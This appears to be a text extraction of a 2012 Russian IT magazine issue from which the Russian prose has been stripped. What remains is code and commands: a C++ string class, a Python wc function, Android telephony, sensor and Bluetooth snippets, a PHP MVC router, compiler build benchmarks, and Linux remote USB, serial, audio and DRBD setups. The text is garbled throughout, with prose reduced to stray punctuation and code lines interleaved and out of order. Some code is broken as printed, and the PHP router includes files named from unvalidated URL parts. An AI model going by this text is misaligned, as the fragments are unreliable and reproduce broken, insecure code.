// 1)
MyString(void);
// 2)
MyString(const MyString & s);
// 5) ,
MyString(const char char_array[], const size_t size);
// 3)
~MyString(void);
// 4)
bool operator == (const MyString & s) const;
// 6) stream <<
friend std::ostream & operator << (std::ostream & out,
const MyString & s);
private: char * buffer_;
size_t buffer_size_;
};
,
. char
,
, buffer_size_ . ,
.
.
MyString
#include "MyString.h"
#include <Windows.h>
MyString::MyString(void): buffer_(nullptr),
buffer_size_(0) {}
099

MyString::MyString(const MyString & s) {
this - > buffer_size_ = s.buffer_size_;
this - > buffer_ = new char[this - > buffer_size_];
memcpy(this - > buffer_, s.buffer_, this - >
buffer_size_);
}
MyString::MyString(const char char_array[],
const size_t size) {
buffer_size_ = size + 1;
buffer_ = new char[buffer_size_];
ZeroMemory(buffer_, buffer_size_);
memcpy(buffer_, char_array, size);
}
MyString::~MyString(void) {
if (buffer_ != nullptr) delete[] buffer_;
}
bool MyString::operator == (const MyString & s) const {
if (buffer_size_ != s.buffer_size_) return false;
for (size_t i = 0; i < buffer_size_; i++) {
if (buffer_[i] != s.buffer_[i]) return false;
}
return true;
}
std::ostream & operator << (std::ostream & out,
const MyString & s) {
out << s.buffer_;
return out;
}
. , , .
,
, wc .
is_leter, , ,
,
.
wc.
l, w c (),
. for, , , len. .
if ,
- \,
, w.
. -, is_letter(i+1) ,
s, . , for s
i.
. , , ,
.
\.
. ,
. ,
:
wc
def wc(s):
l = 0
w = 0
c = len(s)
:
for i in range(1, c):
#!/usr/bin/python
def is_letter(char):
letters = 'abcdefghijklmnopqrstuvwxyz'.split(None)
if str(char).lower() in letters:
return True
else: return False
char = s[i]
if ((not is_letter(char) and
is_letter(s[i - 1])) and
not (i < c - 1 and
def wc(s):
l = w = c = 0
for i in range(len(s)):
char = s[i]
c += 1
if not is_letter(char) and not (is_letter(s[i-1])
and is_letter(i+1) and (char is '-'
or char is '\'')):
w += 1
if char == '\n':
l += 1
return '%d\t%d\t%d\n' % (l, w, c)
if __name__ == "__main__":
import doctest
doctest.testmod()
, .
,
100
is_letter(s[i - 1]) and

is_letter(s[i + 1]) and
(char is '-' or char is '\''))):
w += 1
if char == '\n':
l += 1
if is_letter(s[c - 1]):
w += 1
if not s[c - 1] == '\n':
l += 1
if s[0] == '\n':
l += 1
return '%d\t%d\t%d\n' % (l, w, c)
12 /167/ 2012
is_letter . ,

. list,
, in ,
. ,
is_letter, str, else
.
:
is_letter
def is_letter(char):
letters = 'abcdefghijklmnopqrstuvwxyz'
if char.lower() in letters:
return True
else:
return False
, , doctest unit- . ,
,
, doctest.
,
.
, . , . ,
. , .
:
1) ;
2) ;
3) ;
4) ;
5) ;
6) , .
?

,
. ,
.
, ,
. ,
, .
. ,
. ,
, .
, ,
.
, , , .
.
,

: . .
,
.
12 /167/ 2012

. : , , ,
.
, , ,
. ( , ) , ,
, .
, - . ,
. ?
, , .
.
, ,
, . ,
.
. 1
5, 1 , 5 . ,
,
100 ,
. ,
4,
, , .

, , ,
2 , 1 ,
99. , , . ,
,
3 1 , ,
. ,
2,
, ,
, , . z
101
(dhsilabs@gmail.com)
Android

, Android-. :
,
Android. . Java, Eclipse.
TelephonyManager
, .

.
(
TM).
:
<uses-permission android:name=
"android.permission.READ_PHONE_STATE" />
.
id TextView.
1.
java. ,
.
TelephonyManager .
2.
String EOL = "\n";
//
info =(TextView) findViewById(R.id.info);
// tm
tm = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);
//
StringBuilder sb = new StringBuilder();
//
sb.append(" :\n\n");
sb.append("ID :").
append(tm.getDeviceId()).append(EOL);
sb.append(" : ").
append(tm.getDeviceSoftwareVersion()).append(EOL);
sb.append(" : ").
append(tm.getLine1Number()).append(EOL);
...
//
info.setText(sb.toString());
1. TM/res/layout/main.xml
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/
apk/res/android"
android:orientation="vertical"
android:layout_width="fill_parent"
android:layout_height="fill_parent" >
<TextView android:id="@+id/info"
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:text="@string/hello" />
</LinearLayout>
, SIM-,
:
tm.getSimCountryIso() (ISO);
tm.getSimOperator() ;
tm.getSimOperatorName() ;
tm.getSimSerialNumber() SIM-.
. . 2. - (
, ) TMActivity.
:
tm.getNetworkOperator()
(, SIM-,
, );
102
12 /167/ 2012
Android
tm.getNetworkOperatorName() ;
tm.getNetworkCountryIso() ( ,
, , ,
tm.getSimCountryIso()).
:
tm.getSubscriberId() ID ;
tm.getVoiceMailAlphaTag() - ;
tm.getVoiceMailNumber() .

, .
, :
"android.permission.CALL_PHONE" />

ACTION_CALL ACTION_DIAL.
(
), -
.
startActivity(new Intent(Intent.ACTION_CALL,
Uri.parse("tel:")));
startActivity(new Intent(Intent.ACTION_DIAL,
Uri.parse("tel:")));
, , , .
,

Android: bit.ly/Q6b5h3.
PhoneStateListener.LISTEN_
CALL_STATE,
(, ,
). :
CALL_STATE_IDLE ;
CALL_STATE_RINGING ;
CALL_STATE_OFFHOOK .
,
, . , .
, , , .
,
onCallStateChanged().
,
:
"android.permission.READ_PHONE_STATE" />
, TM (.
1). 3.
DVD CallState.java.
3.
import android.telephony.PhoneStateListener;
import android.telephony.TelephonyManager;
12 /167/ 2012
. 1.
...
info = (TextView) findViewById(R.id.info);
// TelephonyManager
tm = (TelephonyManager) getSystemService
(TELEPHONY_SERVICE);
// LISTEN_CALL_STATE
tm.listen(new TelListener(),
PhoneStateListener.LISTEN_CALL_STATE);
...
private class TelListener extends PhoneStateListener {
public void onCallStateChanged(int state,
String incomingNumber) {
super.onCallStateChanged(state, incomingNumber);
switch (state) {
case TelephonyManager.CALL_STATE_IDLE:
info.setText("IDLE");
break;
case TelephonyManager.CALL_STATE_OFFHOOK:
info.SetText("OFFHOOK, . :" +
incomingNumber);
break;
case TelephonyManager.CALL_STATE_RINGING:
info.SetText("RINGING, . :" +
incomingNumber);
break;
default:
break;
} // switch
} // onCallStateChanged
}
(TextView)
info ,
.

() , , .
,
, .
,
:
TYPE_ACCELEROMETER ,
.
,
, GPS ( ).
TYPE_LIGHT . : ,
, .
.
TYPE_TEMPERATURE .
TYPE_PRESSURE .
103

. getSensorList() SensorManager, .
.
Android.
:
import
import
import
import
android.hardware.Sensor;
android.hardware.SensorEvent;
android.hardware.SensorEventListener;
android.hardware.SensorManager;
cancel()
(, ,
):
Vib.cancel();
BLUETOOTH
Bluetooth :
Bluetooth;
Bluetooth-;
;
.
SensorManager:
private SensorManager myManager = null;
myManager = (SensorManager)getSystemService
(SENSOR_SERVICE);
myManager.registerListener(tempSensorListener,
myManager.getDefaultSensor(Sensor.TYPE_TEMPERATURE),
SensorManager.SENSOR_DELAY_GAME);
registerListener() .
.
tempListener, . , . .
SENSOR_DELAY_
GAME, SENSOR_DELAY_NORMAL.
tempListener.
onAccuracyChanged()
onSensorChanged(). ,
. info ( TextView )
.
Android-, Bluetooth,
:
"android.permission.BLUETOOTH" />
"android.permission.BLUETOOTH_ADMIN" />
android.bluetooth :
BluetoothAdapter Bluetooth-.
BluetoothClass Bluetooth.
BluetoothDevice Bluetooth-.
BluetoothSocket ,
Bluetooth.
BluetoothServerSocket
Bluetooth-.
BLUETOOTH-
:
private final SensorEventListener tempListener =

new SensorEventListener() {
@Override
public void onAccuracyChanged(Sensor sensor,
int accuracy) {}
BluetoothAdapter myBluetooth =
BluetoothAdapter.getDefaultAdapter();
Bluetooth- :
@Override
public void onSensorChanged(SensorEvent event) {
if (event.sensor.getType() ==
Sensor.TYPE_TEMPERATURE) {
info.setText(": " + event.values[0]);
}
}
};
// Bluetooth
if (!myBluetooth.isEnabled()) {
// ACTION_REQUEST_ENABLE,
//
Intent eIntent =
new Intent(BluetoothAdapter.ACTION_REQUEST_ENABLE);
//
startActivity(eIntent);
}
: bit.ly/bEjXq

.

:
"android.permission.VIBRATE" />
Vibrator :
Vibrator Vib = (Vibrator) getSystemService
(Context.VIBRATOR_SERVICE);
Vib.vibrate(3000); //
104
4. Log.d().
4. Bluetooth-
import android.util.Log;...
private final BroadcastReceiver myReceiver =
new BroadcastReceiver() {
public void onReceive(Context context, Intent intent) {
String action = intent.getAction();
//
if (BluetoothDevice.ACTION_FOUND.equals(action)) {
// BluetoothDevice Intent
BluetoothDevice device = intent.getParcelableExtra
(BluetoothDevice.EXTRA_DEVICE);
//
12 /167/ 2012
Android
Log.v("BlueTooth Discovery: ",

device.getName() + "\n" + device.getAddress());
}
}
};
IntentFilter filter =
new IntentFilter(BluetoothDevice.ACTION_FOUND);
registerReceiver(myReceiver, filter);
myBluetooth.startDiscovery();

BLUETOOTH-
-, , -,
. 5 ,
-.
5.
// AcceptBluetoothThread
private class AcceptBluetoothThread extends Thread {
private final BluetoothServerSocket myServerSocket;
public AcceptThread() {
// ,
// myServerSocket,
// myServerSocket
//
BluetoothServerSocket tmp = null;
try {
// MY_UUID ,
tmp = mAdapter.listenUsingRfcommWithServiceRecord
(NAME, MY_UUID);
} catch (IOException e) {}
// tmp myServerSocket
myServerSocket = tmp;
}
public void run() {
BluetoothSocket socket = null;
//
while (true) {
try { //
socket = myServerSocket.accept();
} catch (IOException e) {
break;
}
//
if (socket != null) {
//
DoSomethingWith(socket);
//
myServerSocket.close();
break;
}
}
}
public void cancel() { // ...
try { //
myServerSocket.close();
}
}
-, Bluetooth-. ,
, 6.
6. Bluetooth-
private class ConnectThread extends Thread {
12 /167/ 2012
. 2.
private final BluetoothSocket mySocket;

private final BluetoothDevice myDevice;
public ConnectThread(BluetoothDevice device) {
// ,
// mySocket,
// mySocket
//
BluetoothSocket tmp = null;
myDevice = device;
// BluetoothSocket
// Bluetooth Device
try {
// MY_UUID ,
//
tmp = device.createRfcommSocketToServiceRecord
(MY_UUID);
mySocket = tmp;
}
public void run() {
// ,
//
mAdapter.cancelDiscovery();
try {
//
mySocket.connect();
} catch (IOException connectException) {
// ,
try {
mySocket.close();
} catch (IOException closeException) {}
return;
}
// ,
//
DoSomethingWith(mySocket);
}
public void cancel() {
try {
mySocket.close();
}
}
DVD. .

dhsilabs@mail.ru. z
105
Spider_NET (vr-online.ru)

MVC
: Yii,
Kohana, CodeIgniter.
-,
PHP
Model View Controller. ,
!
!
.
,
.
.
, .
.

. , .
,
.
MVC
MVC ?
,
Model View Controller.

, MVC

-. MVC
1979 , ,
, .
MVC .
Xerox PARC
Small Talk. ,
MVC .
, ,
, . -
, .
Small Talk .
MVC:
MVC . ,
, .
, -
. , ,
MVC
. -
,
. . MVC.
.
MVC,
.
- GUI
. , ,
, ,
.
.
106
12 /167/ 2012
PHP
DVD

SublimeText
MVC
, MVC.
()
. ,
. , ,
.
, ,

MVC. ,
(). (,
).
.
. , ,
. ,
, ,
.
, , MVC . ,

, , , - .
,
. ,
.
-.
? , . ,
, , ,

. , , (HTML/CSS),
.
.
, .
, ,
, .
, .
,
,
.
, , ,
SQL-, ,

. , , , ,
, .
, ,
.
MVC ,
. ,
-,
, - .
.
12 /167/ 2012

.
?
, MVC.
. , , .
. ,
CodeIgniter, Kohana, Yii, , -.
, ,
.
( ), MVC- . ?
, Yii
.
K,
. :
\
application
|- controllers
|- core
|- models
|-views
load.php
.htaccess
index.php
controllers, models, views , .

core . , . load.php .
107
htaccess- ( -) index.php.
.
(
)
load.php.
.
web- (htaccess)
:
$actionName = $piecesOfUrl[2];
}
$modelName = 'Model_' . $controllerName;
$controllerName = 'Controller_' . $controllerName;
$actionName = 'action_' . $actionName;
$fileWithModel = strtolower($modelName) . 'php';
$fileWithModelPath
= "application/models/" .
$fileWithModel;
if (file_exists($fileWithModelPath))
{
include $fileWithModelPath;
}
$fileWithController = strtolower($controllerName).
'.php';
$fileWithControllerPath =
"application/controllers/".
$fileWithController;
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule .* index.php [L]
,
index.php. ,
. index.php :
if (file_exists($fileWithControllerPath))
{
include $fileWithControllerPath;
}
else
{
// .
// , 404
}
<?php
ini_set('display_errors', 1);
require_once 'application/load.php';
index.php
. ,
load.php
, .
, :
$controller = new $controllerName;

$action = $actionName;
<?php
require_once
require_once
require_once
require_once
if (method_exists($controller, $action))
{
call_user_func(array($controller, $action_name),
$piecesOfUrl);
}
else
{
//
}
'core/routing.php';
'core/model.php';
'core/view.php';
'core/controller.php';
//
Routing::execute();

require_once.
.
execute(). , URL ,
. 1.
1. Routing
<?php
class Routing
{
static function execute()
{
$controllerName = 'Main';
$actionName = 'index';
$piecesOfUrl = explode('/', $_SERVER['REQUEST_URI']);
if (!empty($piecesOfUrl[1]))
{
$controllerName = $piecesOfUrl[1];
}
if (!empty($piecesOfUrl[2]))
108
}
}
, . ,
(, ) -
, .
, .
. ,
. ,
, http://oursite.com/main/index.
Main, index.
: .
.
, URL, .
URL . , ( )
, ,
. , -
12 /167/ 2012
PHP
()
URL http://oursite.com/shop/buy,
shop buy.
, 404.
,
, .
, .
. ,
,
, . , ( ), ,
: Model_
. ,
,
.
, .
. ,
, ?
,
404.
PHP method_exists. , ,
. , .
call_user_func().
, , ,
, .
2, 3 4.
class Model
{
public function get() { ... }
}
2. Controller
<?php
<?php
class View
{
function generate($content, $template, $data = null)
{
include 'application/views/'.template;
}
}
,
.
View. generate(),
.

, .

! .
, , ,
. :
. index
:
$this -> view -> generate('myview', 'template.php');
class Controller {
public $model;
public $view;
function __contruct()
{
$this -> view = new View();
}
function action_index()
{ ... }
}
3. Model
<?php
12 /167/ 2012
,
.

. .
, .
,
. !
. , . z
109
. -
110
12 /167/ 2012
. 6

, .
. ,

. , , .
,
.
, , .

.
, ,
. ,
.
- , -
, - .
. ,
.
- ( )
,
.
.

-. , , , , , .
,
.
, , .
, . ,
, ? , ,
. .
-
Setup.ru, . ,
. ,
, 356
.
, .
,
?
,
?

:

. , , . ,
, .
12 /167/ 2012

;
, :
: DNS-, CARP,
heartbeat;
:
;
: ,
,

, , ,
,
. . ,
,

.
? , , .
:
,
.
, .
?
. ,

/ ( ).
-
? ,
, .

?
. , ,
,

.
,
?
,
,
.

.
,
( ,
) .
,
. ,
.

,
:

,
.
,

;

, (
shared nothing), (
stateless);
, , .

.
111

, , ,
,
.
, ,
, , Photosight.ru .
,
,
.
.
, .

, . . ,
,
,
. :
;

-
.
CHAOS MONKEY
,
. ,
?
Netflix Chaos Monkey. ,

- . ,
Chaos Monkey.
, kill -9 .
, , . ,
. ?
, .
! ,
,
.

load averages,
/ , ,
, . , .
:
112

,

.
,
,
.
-

. ,
,

.
,
.

,

:). .
,
, , .
,

.

,
.

-
. -
,

.

.

? , .
HighLoad++
,

-
.

,
! ,

.
, , CSS- JS
.

,
.
, , . ,
,
. ,
?
: pinba
-, , , . ,
-
;
, ,
12 /167/ 2012
. 6
. -
. .
. , .
DevOps,
Skype.
, .
: ?
?, : .
: . ?
. ? . , . , , , .
.
, .
. ,
, . ,
.
. - .
LIPC , .
PHP, Ruby. .
.
, .

. ,
.
,
, -
.
: pinba
,
, .

.
,

, ,
.
deployment
.
20 (
). -
, .
.
, ,
. Amazon

.
EC2,
, -
DEPLOYMENT
HIGHLOAD-

Highload.

,
-.
HighLoad++ (www.highload.
ru). , ,

.

.
,

MySQL,
.
MySQL

. MySQL
5.5. Mail.Ru
NoSQL
Tarantool,
500600 .
Open Source
.

,

,

.
Erlyvideo
(erlyvideo.org). , .

.

, ( ,
Mail.Ru). ,

60 .
-

.
,

,
.
-

, ,
-
.
12 /167/ 2012
113
, ,
Linux .

,
, . ,
deployment.

. ,
. ,
, , :).
.
: . :
. ?
, .
. ,
, . Java?
, . , .
,
.
- , - .
.
, .
, . ,
, -
. , , ,
, .
,
. , Capistrano.
,
, , ,
. .

,
, , ? .
, , ,
.
, ,
.
.

SQL-. ,
.
, SQL .
, . ,
. , SQL-,
, add column, SQL-
.
,
, , ,
.
, , ,
, .
114
Event-driven

Node.js
phpDaemon
AJAX
Long
polling

MySQL

MongoDB
POST-

(PHP-)
.
.
?

.
?
,

(, Node.js),
JavaScript, ,
,
.

AJAX Long Polling ( ).

PHP-,

(, MySQL)
.
,
.
MongoDB.
,

MongoDB Node.js.
,
Node.js.
Node.js
,

.

,
.

,
MongoDB, Node.js MongoDB JSON.

.
.
(, )
.
,
.

heartbeat CARP-
( )
.

,
.

, ,
.
, ,
,
. ! z
12 /167/ 2012
* www.mancard.ru

www.alfabank.ru :
8 (495) 788-88-78
8-800-2000-000 ( )
UNIXOID
(rommanio@yandex.ru)
_kaway_@flickr.com

- C/C++ *nix- GCC.

, LLVM/Clang, Oracle
Compiler Suite
PCC. ,

GNU.
,
. -,
( , C++) Boost,
C++ ( , )
. -, . ,
116
Boost (
?), Apache ImageMagick.
-, .
, , John the Ripper bzip2.
:
P4 530 3 , 2 RAM, HDD Seagate ST31000528AS.
GCC 4.6.3 4.8

- GCC 1987 .
GCC GNU C Compiler.
VAX, SUN
m68k. 1991- ,
1994-, 4.4BSD,
BSD-. GCC EGCS, 1999- .
GCC
:
89 1994 1996 , ,
, return ;
C89 1995
C94 C95;
12 /167/ 2012
Boost GCC
LLVM
C99, ,
bool, inline- , ( ).
Apache,
, , configure, . Apache 1 52 ,
httpd 706 497 . ImageMagick
, Apache.
12 4 .
John the Ripper; , John,
227 524 , MD5 7732 c/s.
1450 bzip2, , ,
,
,
215 914 , 7 56 .
OpenSSL (AES-CBC-256) ,
8192 35 438,59 ( , ). RSA 512
2214,2 .
GCC 4.8, , :
C, C++.
, -Og. , .
(PRE).
x86/x64 , .
GCC ,
C. , ,
, .
! C++? . C C++03. ,
C++98 , C++03
, . ++11, C++0x, C99, . , ,
, , (, friend
),
, , . , , , . ,
, , Volatile- . GCC
4.6.3 Ubuntu 12.04,
. , /, .
Boost ( SVN). ,
,
.
Boost bjam:
$
$
$
$
cd tools/build/v2
./bootstrap.sh --with-toolset=gcc
sudo ./b2 install toolset=gcc
cd ../../..
SVN,
:
$ svn co svn://gcc.gnu.org/svn/gcc/trunk gcc-trunk
/usr/local.
user-config.jam. ,
echo:
$ echo "using gcc ;" > ~/user-config.jam
Boost (
zlib1-dev):
$ time bjam
25 52 , .
12 /167/ 2012

( gcc-multilib, g++multilib, libmpfr-dev libmpc-dev),
:
$ sudo ln -s /usr/include/i386-linux-gnu/gnu/stubs-32.h
/usr/include/gnu/
$ sudo ln -s /usr/lib/i386-linux-gnu/crt*.o /usr/lib/
$ cd gcc-trunk
$ ./configure && make
$ sudo make install
117
UNIXOID
OpenSSL
Oracle Solaris Studio
, ,
- 4.6.3,
Boost .
:
Apache 1 52 ,
706 947 .
ImageMagick 21 33 .
John 217 880 ,
MD5 7927 c/s.
bzip2 () 234 163 , 7 52 .
OpenSSL AES-CBC-256 8192
39 209,64 . /, RSA 512 2222 sign/.
$ bunzp2 SolarisStudio12.3-linux-x86-bin.tar.bz2
$ sudo tar xf SolarisStudio12.3-linux-x86-bin.tar -C /opt
$ export PATH="/opt/SolarisStudio12.3-linux-x86-bin
/solarisstudio12.3/bin:/opt/SolarisStudio12.3
-linux-x86-bin/solarisstudio12.3/prod/bin:$PATH"
COMPILER SUITE
Compiler suite Oracle Solaris
Studio ( , IDE
Solaris). C:
C89, C99;
K&R ANSI C K&R;
OpenMP ;

;
.
C++ ( C, C++ ):
C++98 ++03; C++11, -, , ,
Oracle ;
Sun STLPort;
Boost.
, , , IDE?
, . , - ,
.
bit.ly/S9Ozni, My Oracle , .
.
, , Ubuntu ,
. ,
- ,
.
, ,
( /opt,
/usr/local
):
118
/etc/environment.
Boost
. , , - , , , - , .
Apache, ,
GCC,
. :
$ export CC=cc CXX=cc
ImageMagick .
John (, , bzip2) Makefile: gcc
cc , -W,
.
OpenSSL happycoders-libsocket
happycoders-libsocket-dev, /usr/lib:
$ ln -s /usr/lib/happycoders/lib* /usr/lib/
OpenSSL :
$ ./Configure solaris-x86-cc
:
Apache 1 39 ,
766 368 .
ImageMagick 23 56 .
John 178 756 ,
MD5 6942 c/s.
bzip2 () 180 381 , 8 25 .
76 371,29 . /, RSA 512 849,7 sign/.
PCC
Portable C Compiler . AT&T 19751977 ,
UNIX V7 lex yacc.
4.4BSD, GCC. - ,
12 /167/ 2012
John 178 829 ,

MD5 4325 c/s.
bzip2 () 244 061 , 11 45 .
LLVM CLANG
IR LLVM
, Caldera. , , ,
GCC 2007
.
: pass1 , , pass2 .
. . 70- (
: ,
C ).
50% 80% . C99. Fortran-77. C++ , , .
: ,
GCC, 730 .
, 510
GNU .
.
/ pcc-libs:
$ wget http://pcc.ludd.ltu.se/ftp/pub/pcc-libs/
pcc-libs-20120922.tgz
$ tar xzvf pcc-libs-20120922.tgz
$ cd pcc-libs-20120922
$ ./configure && make
$ sudo make install
:
$
$
$
$
$
wget ftp://pcc.ludd.ltu.se/pub/pcc/pcc-current.tgz
tar xzvf pcc-current.tgz
cd pcc-20120922
./configure && make
sudo make install
,
Compiler suite: CC CXX pcc, bzip2 John the Ripper Makefile.
Boost
. ImageMagick OpenSSL .
:
Apache 1 43 ,
676 763 .
12 /167/ 2012
Clang LLVM ,
. Clang C-
LLVM. LLVM Low-Level Virtual
Machine. LLVM , ,
RISC-. ? .NET? .
: LLVM JIT ( ) .
.
IR. , (JIT-), .
IR- :
iN , N ( );
half, float, double
- ;
x86mmx MMX.
, ;
void ;
metadata , .
, IR- , , , , ,
Clang , LLVM. C-, C, C++, ObjC ObjC++.
.
:
. , , , Clang ,
,
;
() GCC, Open Source ;
IDE;
BSD- Clang
( LLVM ) .
C ,
GCC, C++.
C++98/03,
export ,
, C++11.
C++11 ,
GC ( ). .
LLVM
, ,
RISC-.
? .NET?

119
UNIXOID

PCC
DragonEgg, GCC LLVM, . , ,

, bit.ly/9rXIKc.
LLVM/Clang SVN (,
):
$ svn co http://llvm.org/svn/llvm-project/llvm/
trunk llvm
$ cd llvm/tools
$ svn co http://llvm.org/svn/llvm-project/cfe/
trunk clang
$ cd clang/tools
$ svn co http://llvm.org/svn/llvm-project/
clang-tools-extra/trunk extra
$ cd ~/llvm/projects
$ svn co http://llvm.org/svn/llvm-project/
compiler-rt/trunk compiler-rt
, ,
llvm :
$ ./configure --optimized && make -j4
$ sudo make install
, , ,
( )
, 2 , . CC
CXX clang clang++ , ,
make- bzip2 John.
-, Boost .
, ,
GCC, gcc clang.
:
Boost 51 21 .
Apache 2 2 ,
813 840 .
ImageMagick 10 10 .
John 173 656 ,
MD5 7632 c/s.
bzip2 () 186 861 , 9 31 .
39 291,66 . /, RSA 512 2202,4 sign/.
120
. PCC ImageMagick, OpenSSL.

John bzip2 .
Apache httpd ,
,
, . : PCC
.
. ,
Boost,
GCC 4.8. , John GCC 4.8,
, , bzip2,
.
OpenSSL

,

Clang.
Oracle, Clang.
, ,
, Clang.
? -, Boost , ,
GCC. -,
OpenSSL . - . z
INFO

, :
GCC ProPolice (ibm.co/Tv4Ogt)
GCC, IBM stack smashing ;
SAFECode (bit.ly/QOAQOh) , LLVM Clang,
-, ,
memory safety:
, ,
.
FreeBSD
GCC,
Clang.
, ,
GCC GPL3,
,
,
.
LLVM
OpenGL
Mac OS X 10.5, iPhone
SDK GCC
LLVM.
JVM,

, IR- LLVM
.

(garbage collection)

,
.
GCC 5.0
DVD
,
.
:
. ,
, .
.
.
, .
.

GCC, PCC Clang/
LLVM.
WWW
bit.ly/R1V4ok

OpenBenchmarking.
org
.
12 /167/ 2012
UNIXOID
(execbit.ru)

UNIX
Plan 9,

. ,
,
. ,
.
12 /167/ 2012

,
echo, cat, grep .
,
.
Plan 9 RPC- 9P, ,
, . UNIX
-.

, ,
121
UNIXOID
DRBD-
.

USB-, , .
USB- COM-
,
USB- COM-. , , ,
, -
. Linux
usbip (usbip.sourceforge.net) USB (Virtual Host Controller Interface),
USB- ,
, , .
usbip . -,
usbip (,
):
VirtualGL + TurboVNC + Enemy Territory: Quake Wars
:
$ sudo usbip --attach 192.168.0.101 1-1.2
lsusb,
.
, ; /dev, udev , - USB-.
COM- .
,
remserial (lpccomp.bc.ca/remserial).
, /dev/ttyS0
. , , remserial :
$ sudo apt-get install remserial
$ remserial -d -p 23000 -s "115200 raw" /dev/ttyS0 &
$ sudo apt-get install usbip
, :
$ sudo modprobe usbip_common_mod
$ sudo modprobe usbip
usbip-:
$ sudo usbipd -D
-d , -p
, -s stty,
( ).
remserial :
$ remserial -d -r 192.168.0.101 -p 23000
-s "115200 raw" /dev/ttyS0
,
.
USB- :
$ sudo usbip_bind_driver --list
busid (, 1-1.2), :
$ sudo usbip_bind_driver --usbip 1-1.2
, usbip (
vhci-hcd):
$ sudo apt-get install usbip
$ sudo modprobe usbip_common_mod
$ sudo modprobe vhci-hcd
:
$ sudo usbip --list 192.168.0.101
122

, . ,
HTPC ,
,

.
Linux (, , ) , , ,

ALSA PulseAudio,
-
Linux-. , ,
, JACK
ESD,
, .
, PulseAudio . , -
12 /167/ 2012
. , ,
ID .
pactl (PulseAudio Control):
$ pactl list | grep alsa_out
Name: alsa_output.pci-0000_00_07.0.analog-stereo
Monitor Source: alsa_output.pci-0000_00_07.0.
analog-stereo.monitor
Name: alsa_output.pci-0000_00_07.0.analog-stereo.monitor
Monitor of Sink: alsa_output.pci-0000_00_07.0.
analog-stereo
Monitor Source,
.
netcat:
$ pacat -r -d alsa_output.pci-0000_00_1b.0.
analog-stereo.monitor | nc -l 8888
:
$ nc 192.168.1.1 8008 | pacat -p --latency-msec=5000
--process-time-msec=5000
SSH, :
$ pacat -r -d alsa_output.pci-0000_00_1b.0.
analog-stereo.monitor | ssh user@192.168.1.1
"play -t raw -r 44100 -c -s -b 16 --buffer 100"
, , . , , /,
.
PulseAudio
,
ALSA- snd-aloop, ,
. ,
modprobe.
:
$ sudo modprobe snd-aloop
-, usbip

,
. SSH , :
$ ssh -C IP-- sox -q -t alsa loop
-t wav -b 24 -r 48k - | play -q -
sox (
) , (loop), play
() , .
,
PulseAudio.
, , , MP3.
. :
~/.asoundrc
:
$ sudo modprobe snd-aloop

$ ffmpeg -f alsa -ac 2 -i hw:Loopback,1,0
-acodec libmp3lame -b 128k -f rtp
rtp://IP--:6000 &
$ vi ~/.asoundrc
pcm.!default {
type dmix
slave.pcm "hw:Loopback,0,0"
}
pcm.loop {
type plug
slave.pcm "hw:Loopback,1,0"
}
snd-aloop,
FFmpeg. , MP3,
RTP-, IP, 6000.
, ~/.asoundrc, .
RTP- (, /tmp/stream.sdp), :

12 /167/ 2012
$ vi /tmp/stream.sdp
o=- 0 0 IN IP4 IP-
c=IN IP4 IP-
m=audio 6000 RTP/AVP 14
MPlayer:
$ mplayer /tmp/stream.sdp -really-quiet </dev/null
123
UNIXOID
X11 Events
Application
libGL
Xlib
VirtualGL
GLX
rendered
images
2D X Server
X11 commands
VGL Transport
(optional compression)
uncompressed
image stream
VirtualGL Clint
OpenGL
3D X Server
3D Driver
Application Server
(VirtualGL Server)
Client
Network
VirtualGL
, ,
. PulseAudio ,
snd-aloop .
OpenBSD,
/
aucat.
aucat

:
$ aucat -l
$ aucat -o - | ssh user@host aucat -i -
.
, VirtualGL (www.virtualgl.org).
GL-
, , .

3D- , -
.
VirtualGL .
X11-, ,
VirtualGL :
$ wget http://goo.gl/6Oa65
$ sudo dpkg -i virtualgl*.deb
X-,
- GDM:
$ sudo stop gdm
VirtualGL,
X.org, OpenGL :
$ sudo /opt/VirtualGL/bin/vglserver_config
-config +s +f -t
X.org
:
$ sudo /etc/init.d/gdm start
.
aucat , .
(
UID), aucat
aucat ( ).
, , .

, RDesktop VNC.
UNIX X11,
X11 SSH,
, X11 .
, ,
SSH- ( , ), /etc/ssh/
sshd_config :
X11Forwarding yes
:
$ sudo /etc/init.d/sshd restart
SSH, :
$ ssh -X user@ 'chromium'
124
:
$ vglconnect user@
$ vglrun /usr/bin/xonotic
, , , , ,
. ,
JPEG,
40 25:
$ vglrun -np 2 -c jpeg -q 40 -samp 1 -fps 25

10- . ,
vgl.sh,
( ,
NAT) MP3
( ). ( user server).

vglrun, .
.
, ,
,
- . ,
, ,
,
12 /167/ 2012
VirtualGL
NFS CIFS (Samba), ,

.
,
, .
Linux
DRBD (Distributed Replicated Block Device), / ,
/ .
/etc/drbd.conf:
disk on nodeX / (
, ),
IP- .
drbd8-utils.
:
$ sudo drbdadm create-md drbd0
DRBD:
$ sudo vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
resource r0 {
protocol C;
startup {
wfc-timeout 15;
degr-wfc-timeout 60;
}
net {
cram-hmac-alg sha1;
shared-secret "";
}
on node1 {
device /dev/drbd0;
disk /dev/sda5;
address 192.168.0.1:7788;
meta-disk internal;
}
on node2 {
device /dev/drbd0;
disk /dev/sda7;
address 192.168.0.2:7788;
meta-disk internal;
}
$ sudo /etc/init.d/drbd start
, (
), :
$ sudo drbdadm primary all
,
:
$ sudo mkfs.ext4 /dev/drbd0
$ sudo mount /dev/drbd0 /mnt
, RAID-, . ,
,
,
.
.
FreeBSD, RAID-,
GEOM- ggate. /etc/gg.exports
:
$ sudo vi /etc/gg.exports
192.168.1.0/24 RW /dev/da0s4d

COM-
socat:
$ sudo socat /dev/ttyS0,raw,echo=0,crnl
/dev/ttyS1,raw,echo=0,crnl
usbip
Windows:
% usbip.exe -l 192.168.0.101
% usbip.exe -a 192.168.0.101 1-2.2
12 /167/ 2012
, ,
(RW /),
/. ggated , - (),
:
$ sudo ggatec create -o rw 192.168.1.1 /dev/da0s4d
$ mount /dev/ggate0 /mnt
. .
*nix
, , .
, Plan 9, , , . z
125
SYN/ACK
(grinder@synack.ru), (martin@synack.ru)
A3
18.9:011
K9
A7
01.2:085
T11
25.4:105
20.7:064
Y11
10.4:014
F15
F45
18.9:032
03.2:118
F16
90.5:020
7-
WEB APPLICATION
FIREWALLS
126
-
-,

.

